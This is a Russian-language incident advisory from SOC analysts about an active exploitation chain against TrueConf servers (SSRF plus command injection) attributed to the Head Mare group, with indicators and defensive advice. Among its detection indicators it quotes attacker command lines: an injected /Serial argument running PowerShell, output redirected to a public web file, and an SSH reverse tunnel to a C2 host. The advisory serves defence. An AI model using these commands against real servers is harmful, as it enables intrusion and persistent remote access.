Прямо сейчас в отечественном сегменте быстро набирает обороты атака с эксплуатацией цепочки уязвимостей в ПО для видео-конференц-связи TrueConf. Если в вашей компании используется эта программа, срочно идите под кат. Там мы, команды специалистов по форензике центра мониторинга и реагирования на кибератаки RED Security SOC и компании CICADA8, собрали для вас краткое описание Kill Chain, дали индикаторы компрометации и рекомендации по защите.

Kill Chain

Попытки эксплуатации цепочки уязвимостей в большинстве случаев инициируются с выходных узлов сервиса анонимизации Proton VPN. 

На первом этапе злоумышленники эксплуатируют известные уязвимости TrueConf: BDU:2025-10114 (Server-Side Request Forgery) и BDU:2025-10116 (Command Injection), опубликованные в БДУ ФСТЭК совсем недавно, в августе этого года. Разработчик решения уже выпустил обновления безопасности, однако, судя по растущему числу атак с этим вектором, во многих организациях до сих пор стоят непропатченные версии. 

После успешной эксплуатации этих уязвимостей злоумышленник запускает произвольную команду оболочки cmd.exe (например, скачивание и запуск исполняемых файлов) от имени процесса tc_webmgr.exe (C:\Program Files\TrueConf Server\httpconf\bin\tc_webmgr.exe).

Получив доступ к удаленному выполнению команд на сервере TrueConf, атакующие проводят разведку. Вывод команд перенаправляется в файл по относительному пути ../private/css/c.css (полный путь будет C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css). Таким образом, результат выполняемых команд можно получить в качестве файла через публично доступную директорию веб-сервера.

Следующим шагом злоумышленники создают локального пользователя с привилегированными правами доступа для дальнейшего закрепления в системе (audit, audit1). За этим следует подключение по SSH со скомпрометированного сервера к С&С-серверу злоумышленников для закрепления доступа. Закрепление в инфраструктуре происходит путем установки сервиса, указывающего на вредоносную библиотеку.

После этого злоумышленники начинают разведку инфраструктуры, чтобы выбрать дальнейший вектор атаки.

Атрибуция

По данным коллег из отрасли, некоторые индикаторы относятся к группировке Head Mare. В частности, к адресу 5.178.96[.]82 на VirusTotal дан комментарий: «C2 server Head Mare #APT. Задание_на_оценку_N_2046_от_05_августа_2025_года.zip winnt64_.dll», а сама цепочка атаки совпадает с описанием коллег из BI.ZONE.

Рекомендации и индикаторы компрометации

Итак, первичный доступ получен путем эксплуатации известных уязвимостей TrueConf, для которых уже есть обновление безопасности. Поэтому первое и главное: обновите ПО до самой новой версии.

Также в ходе атаки зафиксировано внедрение вредоносных библиотек и иные методы закрепления в инфраструктуре организации. Для детектирования данной активности атакующих рекомендуем:

• отслеживать доступы и активность процессов tc_webmgr.exe и tc_server.exe;

• заблокировать индикаторы компрометации на периметровом сетевом оборудовании;

• провести поиск перечисленных ниже индикаторов активности злоумышленника.

Мы рекомендуем делать первичную оценку не по индикаторам постэксплуатационной активности злоумышленника (они могут измениться в любое время), а по признакам эксплуатации цепочки уязвимостей. Соответствующие индикаторы даны ниже.

Сетевые индикаторы (постэксплуатационная активность):

Файловые индикаторы (постэксплуатационная активность):

Индикаторы для поиска в данных телеметрии (события старта процессов и т. п.)

• Запуск SSH-туннеля (постэксплуатационная активность):

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 ...@...

• Инъекция команды (успешная эксплуатация BDU:2025-10116, признак эксплуатации):

cmd.exe /s /c ""C:\Program Files\TrueConf Server\tc_server.exe" /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial::||powershell -c "…"|| /File:"D:\TrueConf\activation\offlinereg.vrg""

• Детектирование подозрительного процесса (признак эксплуатации) сигнатурами типа LowFidelity со стороны Windows Defender (такое срабатывание попадает только в файловый лог – C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log и C:\ProgramData\Microsoft\Microsoft AntiMalware\Support\MPLog-*.log):

2025-XX-XXTYY:YY:YY.YYY Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /s /c C:\Program Files\TrueConf Server\tc_server.exe /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c iwr …|sc ../private/css/c.css|| /File:D:\TrueConf\activation\offlinereg.vrg)

• Детектирование подозрительной библиотеки (постэксплуатационная активность) и сбор телеметрии со стороны Windows Defender:

BEGIN BM telemetry GUID:{4AD0B666-1A8A-B24A-0D29-F948A849D844} SignatureID:94230468382436 SigSha:e785adfba47a55a5a94699b391ee10a9299d593f ThreatLevel:0 ProcessID:15244 ProcessCreationTime:X SessionID:0 CreationTime:X ImagePath:C:\Windows\System32\rundll32.exe Taint Info:Friendly: Y; Reason: ; Modules: C:\Program Files\TrueConf Server\httpconf\site\public\r.dll:25,; Parents: C:\Windows\System32\cmd.exe:15764:1,C:\Windows\System32\lsass.exe:900:2, Operations:None END BM telemetry 

• Журнал ошибок веб-сервера TrueConf тоже может содержать признаки эксплуатации (пример пути: C:\TrueConf\web_logs\error.*.log):

error: the required argument for option '--Serial' is missing

Важно: указанная выше строка является однозначным признаком попытки эксплуатации уязвимости (инъекция команды через аргумент /Serial), однако возможно появление эксплойтов, где до инъекции указывается корректный ключ активации.

В этом же журнале могут быть и следы постэксплуатационной активности (вывод stderr-утилит, которые не должны штатно запускаться от веб-сервера).

• Вывод curl:

curl : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again. 

At line:1 char:1

+ curl ident.me|sc ../private/css/c.css

+ ~~~~~~~~~

+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException

+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

• Вывод ssh:

Warning: Permanently added '[xxx]:443' (ED25519) to the list of known hosts.

Используемые техники

1. Initial Access (TA0001)

— Exploit Public-Facing Application (T1190)

2. Execution (TA0002)

— Command and Scripting Interpreter: PowerShell (T1059.001)

— Command and Scripting Interpreter: Windows Command Shell (T1059.003)

— System Binary Proxy Execution: Rundll32 (T1218.011)

3. Persistence (TA0003)

— Create Account: Local Account (T1136.001)

— Valid Accounts: Domain Accounts (T1078.002)

— Valid Accounts: Local Accounts (T1078.003)

— Create or Modify System Process: Windows Service (T1543.003)

4. Credential Access (TA0006)

— OS Credential Dumping: LSASS Memory (T1003.001)

5. Discovery (TA0007)

— Account Discovery: Local Account (T1087.001)

— Network Service Discovery (T1046)

6. Lateral Movement (TA0008)

— Remote Services: Remote Desktop Protocol (T1021.001)

7. Command and Control (TA0011)

— Protocol Tunneling (T1572)

Возможно, позже напишем более подробный разбор TTP этой группировки, а пока дали главное. Это, как мы надеемся, поможет поставить развивающуюся атаку на мониторинг и, если что, быстро задетектить злоумышленников. 

Всем добра и безопасности!